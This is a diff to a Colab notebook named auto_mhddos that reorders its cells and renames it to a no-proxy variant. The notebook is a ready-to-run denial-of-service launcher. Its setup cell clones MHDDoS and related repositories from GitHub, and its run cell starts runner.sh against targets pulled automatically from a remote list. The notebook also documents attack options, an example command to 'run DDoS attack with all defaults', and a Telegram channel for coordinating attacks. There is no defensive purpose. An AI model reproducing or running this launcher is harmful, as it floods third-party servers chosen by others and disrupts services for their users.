--- a/auto_mhddos.ipynb
+++ b/auto_mhddos.ipynb
@@ -3,7 +3,7 @@
   "nbformat_minor": 0,
   "metadata": {
     "colab": {
-      "name": "auto_mhddos.ipynb",
+      "name": "auto_mhddos_no_proxy.ipynb",
       "private_outputs": true,
       "provenance": [],
       "collapsed_sections": []
@@ -20,10 +20,19 @@
     {
       "cell_type": "markdown",
       "source": [
-        "========================================\n",
-        "Menu RUNTIME -> RUN ALL\n",
-        "========================================\n",
-        "If no menu at the top, disable adBlock\n"
+        "#======================================\n",
+        "# Menu \"Runtime\" -> \"Run all\" (Ctrl/⌘ + F9)\n",
+        "#======================================\n",
+        "\n",
+        "If no menu at the top, disable adBlock\n",
+        "\n",
+        "---\n",
+        "\n",
+        "This tool uses [mhddos](https://github.com/MHProDev/MHDDoS) to attack targets from [targets file](https://raw.githubusercontent.com/Aruiem234/auto_mhddos/main/runner_targets). Targets are refreshed automatically.\n",
+        "\n",
+        "---\n",
+        "\n",
+        "Telegram channel: [Украинский жнец (DDoS)](https://t.me/ukrainian_reaper_ddos)"
       ],
       "metadata": {
         "id": "02jB8Um4KqQS"
@@ -32,53 +41,18 @@
     {
       "cell_type": "markdown",
       "source": [
-        "This tool uses [mhddos](https://github.com/MHProDev/MHDDoS) to attack targets from [targets file](https://raw.githubusercontent.com/Aruiem234/auto_mhddos/main/runner_targets). Targets are refreshed automatically.\n",
-        "\n",
-        "Telegram channel: [Украинский жнец (DDoS)](https://t.me/ukrainian_reaper_ddos)\n",
-        "\n"
+        "## Documentation"
       ],
       "metadata": {
-        "id": "e6KJLi-5Ih6R"
+        "id": "8Uw9xUaMCq4x"
       }
-    },
-    {
-      "cell_type": "code",
-      "source": [
-        "!apt-get install ifstat -y\n",
-        "!apt-get upgrade ifstat -y\n",
-        "!python -m pip install --upgrade pip\n",
-        "%cd ~\n",
-        "%rm -r auto_mhddos\n",
-        "!git clone https://github.com/white-sagittarius/auto_mhddos.git\n",
-        "%rm -r mhddos_proxy\n",
-        "!git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy.git\n",
-        "%cd mhddos_proxy\n",
-        "!git clone https://github.com/MHProDev/MHDDoS.git\n",
-        "!python3 -m pip install -r MHDDoS/requirements.txt\n",
-        "%cd ~/auto_mhddos"
-      ],
-      "metadata": {
-        "id": "iwL1D0yQ2Y5X"
-      },
-      "execution_count": null,
-      "outputs": []
-    },
-    {
-      "cell_type": "code",
-      "source": [
-        "!bash runner.sh"
-      ],
-      "metadata": {
-        "id": "5R0oboScD87x"
-      },
-      "execution_count": null,
-      "outputs": []
     },
     {
       "cell_type": "markdown",
       "source": [
+        "---\n",
         "\n",
-        "# Parameters\n",
+        "### Parameters\n",
         "\n",
         "*   `-r`, `--refresh-interval`. How frequently script should refresh targets. Download targets from [targets file](https://raw.githubusercontent.com/Aruiem234/auto_mhddos/main/runner_targets) every NUMBER time units. SUFFIX may be \"m\" for minutes, \"h\" for hours or \"d\" for days. Suggested range: [1h, 1d]. Default: \"1h\"\n",
         "\n",
@@ -100,10 +74,9 @@
         "\n",
         "Please note, that _target_ is as single line from [targets file](https://raw.githubusercontent.com/Aruiem234/auto_mhddos/main/runner_targets) that might contain multiple domains or IP addresses.\n",
         "\n",
+        "---\n",
         "\n",
-        "---\n",
-        "Example commands\n",
-        "---\n",
+        "###Example commands\n",
         "\n",
         "* Run DDoS attack with all defaults\n",
         "```\n",
@@ -123,8 +96,9 @@
         "Long and short options can be mixed in a single command. Order of options does not matter. No options are required.\n",
         "\n",
         "---\n",
-        "#Example output\n",
-        "---\n",
+        "\n",
+        "###Example output\n",
+        "\n",
         "\n",
         "```\n",
         "/root/auto_mhddos\n",
@@ -165,11 +139,64 @@
         "18:10:44   6316.50  136691.0\n",
         "```\n",
         "\n",
-        "---\n"
+        "---\n",
+        "\n",
+        "\n"
       ],
       "metadata": {
-        "id": "qKbhC91zI4jO"
+        "id": "e6KJLi-5Ih6R"
       }
+    },
+    {
+      "cell_type": "markdown",
+      "source": [
+        "## SETUP"
+      ],
+      "metadata": {
+        "id": "ge0NKhvpBvZK"
+      }
+    },
+    {
+      "cell_type": "code",
+      "source": [
+        "!apt-get install ifstat -y\n",
+        "!apt-get upgrade ifstat -y\n",
+        "!python -m pip install --upgrade pip\n",
+        "%cd ~\n",
+        "%rm -r auto_mhddos\n",
+        "!git clone https://github.com/white-sagittarius/auto_mhddos.git\n",
+        "%rm -r mhddos_proxy\n",
+        "!git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy.git\n",
+        "%cd mhddos_proxy\n",
+        "!git clone https://github.com/MHProDev/MHDDoS.git\n",
+        "!python3 -m pip install -r MHDDoS/requirements.txt\n",
+        "%cd ~/auto_mhddos"
+      ],
+      "metadata": {
+        "id": "iwL1D0yQ2Y5X"
+      },
+      "execution_count": null,
+      "outputs": []
+    },
+    {
+      "cell_type": "markdown",
+      "source": [
+        "## RUN"
+      ],
+      "metadata": {
+        "id": "9ZHLG9gfB0eK"
+      }
+    },
+    {
+      "cell_type": "code",
+      "source": [
+        "!bash runner.sh"
+      ],
+      "metadata": {
+        "id": "5R0oboScD87x"
+      },
+      "execution_count": null,
+      "outputs": []
     }
   ]
 }
